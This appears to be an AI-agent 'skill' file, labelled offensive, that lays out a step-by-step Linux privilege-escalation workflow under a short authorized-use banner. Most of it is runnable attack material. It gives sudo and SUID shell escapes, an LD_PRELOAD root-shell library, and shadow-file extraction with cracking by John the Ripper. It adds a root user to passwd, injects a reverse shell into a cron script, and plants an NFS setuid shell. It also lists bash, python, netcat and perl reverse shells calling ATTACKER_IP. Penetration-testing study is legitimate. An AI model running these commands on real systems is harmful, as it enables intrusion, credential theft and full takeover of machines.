| name | linux-privilege-escalation |
| description | Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. |
| risk | offensive |
| source | community |
| author | zebbern |
| date_added | 2026-02-27 |
AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.
Linux Privilege Escalation
Purpose
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.
Inputs / Prerequisites
Required Access
- Low-privilege shell access to target Linux system
- Ability to execute commands (interactive or semi-interactive shell)
- Network access for reverse shell connections (if needed)
- Attacker machine for payload hosting and receiving shells
Technical Requirements
- Understanding of Linux filesystem permissions and ownership
- Familiarity with common Linux utilities and scripting
- Knowledge of kernel versions and associated vulnerabilities
- Basic understanding of compilation (gcc) for custom exploits
Recommended Tools
- LinPEAS, LinEnum, or Linux Smart Enumeration scripts
- Linux Exploit Suggester (LES)
- GTFOBins reference for binary exploitation
- John the Ripper or Hashcat for password cracking
- Netcat or similar for reverse shells
Outputs / Deliverables
Primary Outputs
- Root shell access on target system
- Privilege escalation path documentation
- System enumeration findings report
- Recommendations for remediation
Evidence Artifacts
- Screenshots of successful privilege escalation
- Command output logs demonstrating root access
- Identified vulnerability details
- Exploited configuration files
Core Workflow
Phase 1: System Enumeration
Basic System Information
Gather fundamental system details for vulnerability research:
hostname
uname -a
cat /proc/version
cat /etc/issue
cat /etc/*-release
arch
User and Permission Enumeration
whoami
id
cat /etc/passwd | grep -v nologin | grep -v false
cat /etc/passwd | grep home
groups
w
who
Network Information
ifconfig
ip addr
ip route
netstat -antup
ss -tulpn
netstat -l
Process and Service Enumeration
ps aux
ps -ef
ps axjf
ps aux | grep root
Environment Variables
env
echo $PATH
Phase 2: Automated Enumeration
Deploy automated scripts for comprehensive enumeration:
curl -L -o linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
less linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
./LinEnum.sh -t
./lse.sh -l 1
./les.sh
Transfer scripts to target system:
python3 -m http.server 8000
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Phase 3: Kernel Exploits
Identify Kernel Version
uname -r
cat /proc/version
Search for Exploits
./linux-exploit-suggester.sh
searchsploit linux kernel [version]
Common Kernel Exploits
| Kernel Version | Exploit | CVE |
|---|
| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |
| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |
| 5.8+ | Dirty Pipe | CVE-2022-0847 |
Compile and Execute
wget http://ATTACKER_IP/exploit.c
gcc exploit.c -o exploit
./exploit
Phase 4: Sudo Exploitation
Enumerate Sudo Privileges
sudo -l
GTFOBins Sudo Exploitation
Reference https://gtfobins.github.io for exploitation commands:
sudo vim -c ':!/bin/bash'
sudo find . -exec /bin/sh \; -quit
sudo awk 'BEGIN {system("/bin/bash")}'
sudo python -c 'import os; os.system("/bin/bash")'
sudo less /etc/passwd
!/bin/bash
LD_PRELOAD Exploitation
When env_keep includes LD_PRELOAD:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so find
Phase 5: SUID Binary Exploitation
Find SUID Binaries
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
Exploit SUID Binaries
Reference GTFOBins for SUID exploitation:
LFILE=/etc/shadow
base64 "$LFILE" | base64 -d
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p
find . -exec /bin/sh -p \; -quit
Password Cracking via SUID
base64 /etc/shadow | base64 -d > shadow.txt
base64 /etc/passwd | base64 -d > passwd.txt
unshadow passwd.txt shadow.txt > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Add User to passwd (if nano/vim has SUID)
openssl passwd -1 -salt new newpassword
newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
Phase 6: Capabilities Exploitation
Enumerate Capabilities
getcap -r / 2>/dev/null
Exploit Capabilities
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
Phase 7: Cron Job Exploitation
Enumerate Cron Jobs
cat /etc/crontab
ls -la /var/spool/cron/crontabs/
ls -la /etc/cron.*
systemctl list-timers
Exploit Writable Cron Scripts
ls -la /opt/backup.sh
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
chmod +x /home/user/antivirus.sh
Phase 8: PATH Hijacking
strings /usr/local/bin/suid-binary
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service
/usr/local/bin/suid-binary
Phase 9: NFS Exploitation
cat /etc/exports
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell
/share/shell
Quick Reference
Enumeration Commands Summary
| Purpose | Command |
|---|
| Kernel version | uname -a |
| Current user | id |
| Sudo rights | sudo -l |
| SUID files | find / -perm -u=s -type f 2>/dev/null |
| Capabilities | getcap -r / 2>/dev/null |
| Cron jobs | cat /etc/crontab |
| Writable dirs | find / -writable -type d 2>/dev/null |
| NFS exports | cat /etc/exports |
Reverse Shell One-Liners
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
nc -e /bin/bash ATTACKER_IP 4444
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'
Key Resources
Constraints and Guardrails
Operational Boundaries
- Verify kernel exploits in test environment before production use
- Failed kernel exploits may crash the system
- Document all changes made during privilege escalation
- Maintain access persistence only as authorized
Technical Limitations
- Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)
- AppArmor/SELinux may restrict exploitation techniques
- Container environments limit kernel-level exploits
- Hardened systems may have restricted sudo configurations
Legal and Ethical Requirements
- Written authorization required before testing
- Stay within defined scope boundaries
- Report critical findings immediately
- Do not access data beyond scope requirements
Examples
Example 1: Sudo to Root via find
Scenario: User has sudo rights for find command
$ sudo -l
User user may run the following commands:
(root) NOPASSWD: /usr/bin/find
$ sudo find . -exec /bin/bash \; -quit
uid=0(root) gid=0(root) groups=0(root)
Example 2: SUID base64 for Shadow Access
Scenario: base64 binary has SUID bit set
$ find / -perm -u=s -type f 2>/dev/null | grep base64
/usr/bin/base64
$ base64 /etc/shadow | base64 -d
root:$6$xyz...:18000:0:99999:7:::
$ john --wordlist=rockyou.txt shadow.txt
Example 3: Cron Job Script Hijacking
Scenario: Root cron job executes writable script
$ cat /etc/crontab
* * * * * root /opt/scripts/backup.sh
$ ls -la /opt/scripts/backup.sh
-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh
$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh
$ /tmp/bash -p
uid=1000(user) gid=1000(user) euid=0(root)
Troubleshooting
| Issue | Solutions |
|---|
| Exploit compilation fails | Check for gcc: which gcc; compile on attacker for same arch; use gcc -static |
| Reverse shell not connecting | Check firewall; try ports 443/80; use staged payloads; check egress filtering |
| SUID binary not exploitable | Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges |
| Cron job not executing | Verify cron running: service cron status; check +x permissions; verify PATH in crontab |
When to Use
This skill is applicable to execute the workflow or actions described in the overview.
